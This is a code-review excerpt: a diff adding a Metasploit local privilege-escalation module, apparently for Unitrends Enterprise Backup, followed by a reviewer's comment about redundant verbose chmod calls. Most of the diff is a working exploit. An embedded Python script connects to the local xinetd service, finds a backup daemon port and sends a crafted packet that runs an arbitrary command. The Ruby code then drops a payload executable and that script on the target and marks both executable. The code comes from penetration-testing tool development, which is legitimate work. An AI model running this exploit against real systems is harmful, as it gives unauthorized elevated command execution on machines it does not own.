modules/exploits/linux/local/ueb_priv_esc.rb

```diff
@@ -0,0 +1,175 @@
+    # of this: https://www.exploit-db.com/exploits/42957/
+
+pe_script = %q{
+import socket
+import binascii
+import struct
+import time
+import sys
+from optparse import OptionParser
+
+# Parse command line args:
+usage = "Usage: %prog -c 'touch /tmp/foooooooooooo'"
+
+parser = OptionParser(usage=usage)
+parser.add_option("-c", '--cmd', dest='cmd', action="store",
+          help="Run a custom command, no reverse shell for you.")
+parser.add_option("-x", '--xinetd', dest='xinetd', action="store",
+          type="int", default=1743,
+          help="port on which xinetd is running (default: 1743)")
+
+(options, args) = parser.parse_args()
+
+RHOST = '127.0.0.1'
+XINETDPORT = options.xinetd
+cmd = options.cmd
+
+def recv_timeout(the_socket,timeout=2):
+    the_socket.setblocking(0)
+    total_data=[];data='';begin=time.time()
+    while 1:
+        #if you got some data, then break after wait sec
+        if total_data and time.time()-begin>timeout:
+            break
+        #if you got no data at all, wait a little longer
+        elif time.time()-begin>timeout*2:
+            break
+        try:
+            data=the_socket.recv(8192)
+            if data:
+                total_data.append(data)
+                begin=time.time()
+            else:
+                time.sleep(0.1)
+        except:
+            pass
+    return ''.join(total_data)
+
+print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
+
+try:
+  s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s1.connect((RHOST,XINETDPORT))
+except:
+  print "[!] Failed to connect!"
+  exit()
+
+data = s1.recv(4096)
+bpd_port = int(data[-8:-3])
+
+try:
+  pass
+  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s2.connect((RHOST, bpd_port))
+except:
+  print "[!] Failed to connect!"
+  s1.close()
+  exit()
+
+print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
+print "[+] '{0}'".format(cmd)
+
+cmd_len = chr(len(cmd) + 3)
+packet_len = chr(len(cmd) + 23)
+
+packet = '\\xa5\\x52\\x00\\x2d'
+packet += '\\x00' * 3
+packet += packet_len
+packet += '\\x00' * 3
+packet += '\\x01'
+packet += '\\x00' * 3
+packet += '\\x4c'
+packet += '\\x00' * 3
+packet += cmd_len
+packet += cmd
+packet += '\\x00' * 3
+
+s1.send(packet)
+
+data = recv_timeout(s2)
+
+print data
+
+s1.close()
+#s2.close()
+}
+
+    pl = generate_payload_exe
+    exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
+    print_status("Writing payload executable to '#{exe_path}'")
+
+    write_file(exe_path, pl)
+    register_file_for_cleanup(exe_path)
+
+    pes_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
+    print_status("Writing privesc script to '#{pes_path}'")
+
+    write_file(pes_path, pe_script)
+    register_file_for_cleanup(pes_path)
+
+    print_status("Fixing permissions")
+    vprint_status cmd_exec("chmod +x #{exe_path}")
+    vprint_status cmd_exec("chmod +x #{pes_path}")
```

Comment:
These two lines, when verbose is on, result in an empty string printing.  I'd remove the `vprint_status` and execute both chmods in a single `cmd_exec`